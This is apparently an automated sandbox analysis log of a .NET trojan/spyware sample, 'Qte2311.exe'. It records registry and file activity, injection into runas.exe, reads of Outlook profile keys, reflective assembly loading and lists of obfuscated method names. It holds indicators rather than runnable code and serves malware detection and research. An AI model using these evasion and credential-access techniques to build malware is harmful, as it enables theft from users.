Source: C:\Users\user\Desktop\Qte2311.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\Qte2311.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qte2311.exe.log
Source: C:\Windows\SysWOW64\runas.exe File created: C:\Users\user\AppData\Local\Temp\r27485
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@14/8
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, wfAySfgxmRVIktpuXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.AddAccessRule
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, wfAySfgxmRVIktpuXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, wfAySfgxmRVIktpuXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.AddAccessRule
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.AddAccessRule
Source: Qte2311.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Qte2311.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Qte2311.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\runas.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Qte2311.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Qte2311.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Qte2311.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: firefox.pdbP source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rcQ.pdb source: Qte2311.exe
Source: Binary string: runas.pdbGCTL source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110091796.0000000000608000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110534706.000000000099E000.00000002.00000001.01000000.0000000C.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4110753572.000000000099E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Qte2311.exe, 00000003.00000002.1744906371.0000000001810000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1744647151.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.0000000005070000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1747191633.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.000000000520E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Qte2311.exe, Qte2311.exe, 00000003.00000002.1744906371.0000000001810000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000005.00000003.1744647151.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.0000000005070000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1747191633.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.000000000520E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: runas.pdb source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110091796.0000000000608000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rcQ.pdbSHA256 source: Qte2311.exe

Data Obfuscation

Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs .Net Code: gDTn2luWOJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs .Net Code: gDTn2luWOJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs .Net Code: gDTn2luWOJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.Qte2311.exe.5d80000.10.raw.unpack, RFebBaClhEWIFvwxqU.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Qte2311.exe.3573c38.7.raw.unpack, RFebBaClhEWIFvwxqU.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01A704F0 pushad ; ret 0_2_01A704F9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01A75EB4 push dword ptr [edx+ebp*2-75h]; iretd 0_2_01A75EBF
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01AE5947 pushfd ; retf 0_2_01AE5951
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040220B pushad ; retf 3_2_0040220E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040222C pushad ; retf 3_2_0040222F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00412442 push ebx; ret 3_2_0041244C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0041AC59 push edi; ret 3_2_0041AC5A
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0042B4B2 push eax; ret 3_2_0042B4B4
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00417D29 push ds; ret 3_2_00417DF8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00415DC3 push edi; ret 3_2_00415DC9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00417DC4 push ds; ret 3_2_00417DF8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004037E0 push eax; ret 3_2_004037E2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0181225F pushad ; ret 3_2_018127F9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018127FA pushad ; ret 3_2_018127F9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018409AD push ecx; mov dword ptr [esp], ecx 3_2_018409B6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0181283D push eax; iretd 3_2_01812858
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01811200 push eax; iretd 3_2_01811369
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050727FA pushad ; ret 5_2_050727F9
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0507225F pushad ; ret 5_2_050727F9
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A09AD push ecx; mov dword ptr [esp], ecx 5_2_050A09B6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0507283D push eax; iretd 5_2_05072858
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB01BA push eax; iretd 5_2_02FB01CA
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB21A0 push ds; iretd 5_2_02FB21A6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA25E0 push edi; ret 5_2_02FA25E6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB48DD push ebx; retf 5_2_02FB493A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9EC5F push ebx; ret 5_2_02F9EC69
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA1B80 push esi; ret 5_2_02FA1B8A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA1B79 push esi; ret 5_2_02FA1B8A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB19C8 push ecx; retf 5_2_02FB19D5
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FAF97B push es; iretd 5_2_02FAF9CF
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB7CCF push eax; ret 5_2_02FB7CD1
Source: initial sample Static PE information: section name: .text entropy: 7.981884618457205
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, Voy8b6ZMRukkb5xiDt.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pO2dCcJvsK', 'wpidkbkyXD', 'Fx7dzWuPUu', 'jNPIsoaYaX', 'hSXIygC4aK', 'mPaIdEGp99', 'v1sIIUEYhX', 'LkXQoku0DI6vM9Wxnx7'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, xUWyhiysamSMKd6myu7.cs High entropy of concatenated method names: 'FDVxYrGG4u', 'UKZxTZ4Aw2', 'dWmx2GRjrU', 'Gx8xePp34d', 'HxMxjl9JH3', 'mv0xuGl0aF', 'IkJxok3ELm', 'hZKxgmmmUo', 'rBWxBEaAZo', 'vHXxmWkKs2'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, qoYjUVK186LcMneFXY.cs High entropy of concatenated method names: 'fcC5MuhoDAVC8fpITqf', 'IyepUGhFlsrkbSJd1x7', 'txZPXWN0RN', 'V06PxloTRy', 'nZqPvp8GuL', 'E2NSR4hqdgNvWYsWbXG', 'ThiR6EhEX1Yc48kpaLn'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, cbw4BF7hc8WltC5E28.cs High entropy of concatenated method names: 'cHMNglOSEr', 'MaJNBYSMyq', 'AdgN8APjx1', 'sIJNKKRqhF', 'H8HNLbDZFZ', 'nbFNRy0sfG', 'AAqNDw7c27', 'h3tNA535WE', 'Of4NqwXQEk', 'HBJNVCohJh'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, OGsM83nPkcRxEWcFWw.cs High entropy of concatenated method names: 'SP3yFfAySf', 'rmRypVIktp', 'yoNya4k6kY', 'JAYytkWgTE', 'HXNyixkdWX', 'V27yMxdQ8q', 'rpZL0tUmb3kXXdXjlh', 'D3AH0UrnfPO2ag4uJI', 'W7KyyacvkX', 'XI8yI7RiGo'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, r8Z1FTBoN4k6kYRAYk.cs High entropy of concatenated method names: 'y22ZeiEHYw', 'KEnZufeL8a', 'GYNZgo6ueu', 'hWlZBjEOhu', 'a6LZioZWCE', 'MuMZMfbgM9', 'iZaZHhvA2G', 'dgyZX70oxi', 'La1Zxgi0y6', 'w21ZvUEc80'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, TkSvfg47RObi0XIVRI.cs High entropy of concatenated method names: 'CNUiqO2Tqr', 'Qb4i9IjF6k', 'mtti4YfSOn', 'UopiJueOJi', 'nR5iKjIgrw', 'jegi0rbxft', 'OvGiLuHR8u', 'AxqiRsi2DI', 'HWaiUMnBIx', 'DHkiD3xO6K'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, U5pRMPCa6VC6HGfiEZ.cs High entropy of concatenated method names: 'eB9X8BHpn7', 'YNuXKUixdY', 'SjgX0KIo3j', 'QL8XLnVZst', 'fImX4FjQjK', 'CQSXRdKE93', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, VPZ6xUzKp1Ls0mJXyg.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yqpxNIrZmt', 'csexiw5ePy', 'PjLxMdiCCH', 'NL8xH2wM0X', 'HJ6xXWybYj', 'eqaxxnfAIy', 'g2Qxv0oHVi'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs High entropy of concatenated method names: 'EIVIQSkH7H', 'TA7IWpuOcg', 'uFFIrlAF8X', 'U70IZP1COR', 'naIIw5fwfw', 'ui6IPxvgky', 'bpFIFX2qc4', 'nn6IpsYJLE', 'dakIcYNgGC', 'DWUIaRKRJf'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, ovhRaAGpf1fMbU5l9h.cs High entropy of concatenated method names: 'ToString', 'kfkMV0Y6KM', 'pHhMK4MvLo', 'wQfM0QuLCP', 'SGuML4Am2X', 'dbkMRiHdL7', 'RRVMU42owk', 'l4DMDtESw2', 'NVZMA1XqN3', 'gOHM1Z6RsP'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, cC3eJfhCkmhjbdHysN.cs High entropy of concatenated method names: 'OZXXWFmXPa', 'IArXrMQh9L', 'ifRXZqMAf5', 'brnXwmbyhC', 'StXXPd4LIx', 'GCLXFMdwaS', 'jQkXpk34NO', 'cmFXcI8PeY', 'wcXXa7854p', 'U6jXtfJqFv'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, meriZ7EYoOBu2ojZb8.cs High entropy of concatenated method names: 'w7fHhlfmqD', 'TdRHkDwv0T', 'cxIXsI2bOO', 'Qw8XybGeUr', 'VYeHVtWfJ4', 'w4RH9Rk82k', 'N1vH7pyY7w', 'tm6H40Qvds', 'SLXHJqDStj', 'TyrHGGHNbQ'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, bWXE278xdQ8qkeWCIX.cs High entropy of concatenated method names: 'Dn9PQl9BeS', 'HVIPrwTRyA', 'h8aPw25IfY', 'PbQPFtPtFm', 'JJSPpf2kmB', 'WFUwf4Vp10', 'xA6wEPbxu3', 'mH0wSVV4o1', 'P02whNqfnw', 'tZSwCyMQFL'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, NQYow7deJNioTERq6h.cs High entropy of concatenated method names: 'YY42tKnFY', 'wqKev2KiW', 'xGbuxUycS', 'qXqol7dS9', 'lELBoVp9k', 'UclmtNCf8', 'srmumlG0GGbFwFGjal', 'ReIMv2jdeqtemx1Qfg', 'UCfXrTJhu', 'r60vVFD7b'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, wfAySfgxmRVIktpuXE.cs High entropy of concatenated method names: 'ctZr43FsKS', 'To9rJyUqXo', 'S9drGlpDEr', 'UutrlnijEg', 'i5JrfEdNfw', 'K6erET80bH', 'WPPrSTlAx4', 'DEJrhK6TAT', 'uAbrCAgx9a', 'QGprkt0gcO'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, iQCLXtrLIG6D8GYfAs.cs High entropy of concatenated method names: 'Dispose', 'kDsyCnc8j6', 'U3HdKcOSrw', 'F4rRRfwpCa', 'HdCyk3eJfC', 'YmhyzjbdHy', 'ProcessDialogKey', 'aNfds5pRMP', 'm6VdyC6HGf', 'oEZddast9X'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, FAQOrgyIQbmeQ1OYZno.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpgv4rLqD5', 'gkMvJtpn2k', 'b1WvGswW6o', 've4vlYk3wg', 'nc0vfsW4HT', 'Y2hvEWdEUO', 'jnJvS9AsIZ'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, KhxNDu1Lf1HxQS38aY.cs High entropy of concatenated method names: 'WTKFYE264Z', 'ldSFTpt4nN', 'uKtF24eYDg', 'POHFelECrO', 'hmFFjFGCX2', 'fNfFuWkwGB', 'kGAFoHJSAW', 'PZ2Fg6n3ns', 'sLEFBkFdtP', 'Wa8FmcKLmW'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, mst9XkkeDYOXv81Yuy.cs High entropy of concatenated method names: 'UMpxy1lwB4', 'BppxIK8YJR', 'Lwbxndn8Db', 'lvVxWrxnft', 'PyqxrhBv3M', 'Q8rxwC5Lwx', 'TfLxP3i7v5', 'K3XXS6t6fd', 'Q9XXhvnqJD', 'EGYXCyTQcl'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, XiuuH8DXABAeATYjnw.cs High entropy of concatenated method names: 'Dn3FWmjfeq', 'x85FZi0UhN', 'OQcFPbeiod', 'PMxPkO0joH', 'hevPzRsnlZ', 'mpQFskqNDh', 'VLsFy3fJyk', 'jbMFdZ1dCA', 'fKJFIIsbxO', 'xm4Fne1T0R'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, Voy8b6ZMRukkb5xiDt.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pO2dCcJvsK', 'wpidkbkyXD', 'Fx7dzWuPUu', 'jNPIsoaYaX', 'hSXIygC4aK', 'mPaIdEGp99', 'v1sIIUEYhX', 'LkXQoku0DI6vM9Wxnx7'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, xUWyhiysamSMKd6myu7.cs High entropy of concatenated method names: 'FDVxYrGG4u', 'UKZxTZ4Aw2', 'dWmx2GRjrU', 'Gx8xePp34d', 'HxMxjl9JH3', 'mv0xuGl0aF', 'IkJxok3ELm', 'hZKxgmmmUo', 'rBWxBEaAZo', 'vHXxmWkKs2'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, qoYjUVK186LcMneFXY.cs High entropy of concatenated method names: 'fcC5MuhoDAVC8fpITqf', 'IyepUGhFlsrkbSJd1x7', 'txZPXWN0RN', 'V06PxloTRy', 'nZqPvp8GuL', 'E2NSR4hqdgNvWYsWbXG', 'ThiR6EhEX1Yc48kpaLn'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, cbw4BF7hc8WltC5E28.cs High entropy of concatenated method names: 'cHMNglOSEr', 'MaJNBYSMyq', 'AdgN8APjx1', 'sIJNKKRqhF', 'H8HNLbDZFZ', 'nbFNRy0sfG', 'AAqNDw7c27', 'h3tNA535WE', 'Of4NqwXQEk', 'HBJNVCohJh'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, OGsM83nPkcRxEWcFWw.cs High entropy of concatenated method names: 'SP3yFfAySf', 'rmRypVIktp', 'yoNya4k6kY', 'JAYytkWgTE', 'HXNyixkdWX', 'V27yMxdQ8q', 'rpZL0tUmb3kXXdXjlh', 'D3AH0UrnfPO2ag4uJI', 'W7KyyacvkX', 'XI8yI7RiGo'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, r8Z1FTBoN4k6kYRAYk.cs High entropy of concatenated method names: 'y22ZeiEHYw', 'KEnZufeL8a', 'GYNZgo6ueu', 'hWlZBjEOhu', 'a6LZioZWCE', 'MuMZMfbgM9', 'iZaZHhvA2G', 'dgyZX70oxi', 'La1Zxgi0y6', 'w21ZvUEc80'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, TkSvfg47RObi0XIVRI.cs High entropy of concatenated method names: 'CNUiqO2Tqr', 'Qb4i9IjF6k', 'mtti4YfSOn', 'UopiJueOJi', 'nR5iKjIgrw', 'jegi0rbxft', 'OvGiLuHR8u', 'AxqiRsi2DI', 'HWaiUMnBIx', 'DHkiD3xO6K'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, U5pRMPCa6VC6HGfiEZ.cs High entropy of concatenated method names: 'eB9X8BHpn7', 'YNuXKUixdY', 'SjgX0KIo3j', 'QL8XLnVZst', 'fImX4FjQjK', 'CQSXRdKE93', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, VPZ6xUzKp1Ls0mJXyg.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yqpxNIrZmt', 'csexiw5ePy', 'PjLxMdiCCH', 'NL8xH2wM0X', 'HJ6xXWybYj', 'eqaxxnfAIy', 'g2Qxv0oHVi'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs High entropy of concatenated method names: 'EIVIQSkH7H', 'TA7IWpuOcg', 'uFFIrlAF8X', 'U70IZP1COR', 'naIIw5fwfw', 'ui6IPxvgky', 'bpFIFX2qc4', 'nn6IpsYJLE', 'dakIcYNgGC', 'DWUIaRKRJf'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, ovhRaAGpf1fMbU5l9h.cs High entropy of concatenated method names: 'ToString', 'kfkMV0Y6KM', 'pHhMK4MvLo', 'wQfM0QuLCP', 'SGuML4Am2X', 'dbkMRiHdL7', 'RRVMU42owk', 'l4DMDtESw2', 'NVZMA1XqN3', 'gOHM1Z6RsP'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, cC3eJfhCkmhjbdHysN.cs High entropy of concatenated method names: 'OZXXWFmXPa', 'IArXrMQh9L', 'ifRXZqMAf5', 'brnXwmbyhC', 'StXXPd4LIx', 'GCLXFMdwaS', 'jQkXpk34NO', 'cmFXcI8PeY', 'wcXXa7854p', 'U6jXtfJqFv'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, meriZ7EYoOBu2ojZb8.cs High entropy of concatenated method names: 'w7fHhlfmqD', 'TdRHkDwv0T', 'cxIXsI2bOO', 'Qw8XybGeUr', 'VYeHVtWfJ4', 'w4RH9Rk82k', 'N1vH7pyY7w', 'tm6H40Qvds', 'SLXHJqDStj', 'TyrHGGHNbQ'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, bWXE278xdQ8qkeWCIX.cs High entropy of concatenated method names: 'Dn9PQl9BeS', 'HVIPrwTRyA', 'h8aPw25IfY', 'PbQPFtPtFm', 'JJSPpf2kmB', 'WFUwf4Vp10', 'xA6wEPbxu3', 'mH0wSVV4o1', 'P02whNqfnw', 'tZSwCyMQFL'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, NQYow7deJNioTERq6h.cs High entropy of concatenated method names: 'YY42tKnFY', 'wqKev2KiW', 'xGbuxUycS', 'qXqol7dS9', 'lELBoVp9k', 'UclmtNCf8', 'srmumlG0GGbFwFGjal', 'ReIMv2jdeqtemx1Qfg', 'UCfXrTJhu', 'r60vVFD7b'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, wfAySfgxmRVIktpuXE.cs High entropy of concatenated method names: 'ctZr43FsKS', 'To9rJyUqXo', 'S9drGlpDEr', 'UutrlnijEg', 'i5JrfEdNfw', 'K6erET80bH', 'WPPrSTlAx4', 'DEJrhK6TAT', 'uAbrCAgx9a', 'QGprkt0gcO'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, iQCLXtrLIG6D8GYfAs.cs High entropy of concatenated method names: 'Dispose', 'kDsyCnc8j6', 'U3HdKcOSrw', 'F4rRRfwpCa', 'HdCyk3eJfC', 'YmhyzjbdHy', 'ProcessDialogKey', 'aNfds5pRMP', 'm6VdyC6HGf', 'oEZddast9X'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, FAQOrgyIQbmeQ1OYZno.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpgv4rLqD5', 'gkMvJtpn2k', 'b1WvGswW6o', 've4vlYk3wg', 'nc0vfsW4HT', 'Y2hvEWdEUO', 'jnJvS9AsIZ'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, KhxNDu1Lf1HxQS38aY.cs High entropy of concatenated method names: 'WTKFYE264Z', 'ldSFTpt4nN', 'uKtF24eYDg', 'POHFelECrO', 'hmFFjFGCX2', 'fNfFuWkwGB', 'kGAFoHJSAW', 'PZ2Fg6n3ns', 'sLEFBkFdtP', 'Wa8FmcKLmW'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, mst9XkkeDYOXv81Yuy.cs High entropy of concatenated method names: 'UMpxy1lwB4', 'BppxIK8YJR', 'Lwbxndn8Db', 'lvVxWrxnft', 'PyqxrhBv3M', 'Q8rxwC5Lwx', 'TfLxP3i7v5', 'K3XXS6t6fd', 'Q9XXhvnqJD', 'EGYXCyTQcl'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, XiuuH8DXABAeATYjnw.cs High entropy of concatenated method names: 'Dn3FWmjfeq', 'x85FZi0UhN', 'OQcFPbeiod', 'PMxPkO0joH', 'hevPzRsnlZ', 'mpQFskqNDh', 'VLsFy3fJyk', 'jbMFdZ1dCA', 'fKJFIIsbxO', 'xm4Fne1T0R'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, Voy8b6ZMRukkb5xiDt.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pO2dCcJvsK', 'wpidkbkyXD', 'Fx7dzWuPUu', 'jNPIsoaYaX', 'hSXIygC4aK', 'mPaIdEGp99', 'v1sIIUEYhX', 'LkXQoku0DI6vM9Wxnx7'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, xUWyhiysamSMKd6myu7.cs High entropy of concatenated method names: 'FDVxYrGG4u', 'UKZxTZ4Aw2', 'dWmx2GRjrU', 'Gx8xePp34d', 'HxMxjl9JH3', 'mv0xuGl0aF', 'IkJxok3ELm', 'hZKxgmmmUo', 'rBWxBEaAZo', 'vHXxmWkKs2'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, qoYjUVK186LcMneFXY.cs High entropy of concatenated method names: 'fcC5MuhoDAVC8fpITqf', 'IyepUGhFlsrkbSJd1x7', 'txZPXWN0RN', 'V06PxloTRy', 'nZqPvp8GuL', 'E2NSR4hqdgNvWYsWbXG', 'ThiR6EhEX1Yc48kpaLn'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, cbw4BF7hc8WltC5E28.cs High entropy of concatenated method names: 'cHMNglOSEr', 'MaJNBYSMyq', 'AdgN8APjx1', 'sIJNKKRqhF', 'H8HNLbDZFZ', 'nbFNRy0sfG', 'AAqNDw7c27', 'h3tNA535WE', 'Of4NqwXQEk', 'HBJNVCohJh'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, OGsM83nPkcRxEWcFWw.cs High entropy of concatenated method names: 'SP3yFfAySf', 'rmRypVIktp', 'yoNya4k6kY', 'JAYytkWgTE', 'HXNyixkdWX', 'V27yMxdQ8q', 'rpZL0tUmb3kXXdXjlh', 'D3AH0UrnfPO2ag4uJI', 'W7KyyacvkX', 'XI8yI7RiGo'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, r8Z1FTBoN4k6kYRAYk.cs High entropy of concatenated method names: 'y22ZeiEHYw', 'KEnZufeL8a', 'GYNZgo6ueu', 'hWlZBjEOhu', 'a6LZioZWCE', 'MuMZMfbgM9', 'iZaZHhvA2G', 'dgyZX70oxi', 'La1Zxgi0y6', 'w21ZvUEc80'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, TkSvfg47RObi0XIVRI.cs High entropy of concatenated method names: 'CNUiqO2Tqr', 'Qb4i9IjF6k', 'mtti4YfSOn', 'UopiJueOJi', 'nR5iKjIgrw', 'jegi0rbxft', 'OvGiLuHR8u', 'AxqiRsi2DI', 'HWaiUMnBIx', 'DHkiD3xO6K'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, U5pRMPCa6VC6HGfiEZ.cs High entropy of concatenated method names: 'eB9X8BHpn7', 'YNuXKUixdY', 'SjgX0KIo3j', 'QL8XLnVZst', 'fImX4FjQjK', 'CQSXRdKE93', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, VPZ6xUzKp1Ls0mJXyg.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yqpxNIrZmt', 'csexiw5ePy', 'PjLxMdiCCH', 'NL8xH2wM0X', 'HJ6xXWybYj', 'eqaxxnfAIy', 'g2Qxv0oHVi'
